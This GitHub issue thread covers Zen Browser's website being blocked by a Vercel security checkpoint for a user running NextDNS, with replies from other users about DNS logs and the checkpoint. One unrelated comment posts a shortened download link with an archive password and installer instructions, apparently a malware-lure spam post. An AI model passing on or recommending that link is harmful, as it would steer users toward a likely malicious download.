### ISSUE TITLE
Website vercel security check doesn't allow for custom DNS (nextdns.io)

### ISSUE THREAD

**Issue by dunfoy** [zen-browser/desktop#969]
### What happened?

Hi there! I was struggling for the past couple of days to access the zen browser website. I found it was a problem with zen and firefox but not chrome and traced it back to a combination of the firefox/zen (betterfox perhaps?) config and my nextdns settings. Disabling nextdns granted me access where previously I was barred by the vercel attack checkpoint. I had systemwide DNS on and was able to access the site from chrome so I suspect it has something to do with the firefox DNS over https settings or something of the like and not the nextdns settings exclusively.

Normally it wouldn't be such an issue but seeing as the website is the place where one can acquire themes and important updates (these weren't available either) I thought I'd share my solution in case anyone else was dealing with the same issue!

---------
(PS: Also if the developers see this thank you so much for working on this project!! I'm so thrilled to test out the featureset of browsers like edge and arc as a hardcore firefox user for open-source/privacy concerns. Absolutely LOVE your implementation of vertical tabs !! (One other small issue I noticed is that in compact mode, if the toolbars are made visible, the top of the sidebar is cut off from view [not sure if that's intentional]). Thanks again for such amazing work! Can't wait for you guys to put all the other browsers in the game to shame with your innovation. Keep up the great work!!! 💪)

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

Alpha build - 1.0.0-a.30 (2024-08-26)

### Severity impact

Low

### What platform are you seeing the problem on?

macOS - aarch64

### Relevant log output

```shell
zen browser message:

Unable to connect

An error occurred during a connection to zen-browser.app.

    The site could be temporarily unavailable or too busy. Try again in a few moments.
    If you are unable to load any pages, check your computer’s network connection.
    If your computer or network is protected by a firewall or proxy, make sure that Zen Browser is permitted to access the web.
```

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by NOCanoa** [comment]
did u check your nextdns logs? u can see there whitch rule is blocking it

**Comment by Ast3risk-ops** [comment]
Same, the checkpoint fails for me and archival bots like the Wayback Machine, IMO it should be disabled.

**Comment by Ast3risk-ops** [comment]
So far it hasn't happened to me, was the checkpoint removed?

**Comment by nocanoa** [comment]
@Ast3risk-ops lol funny bot, site is now on cf
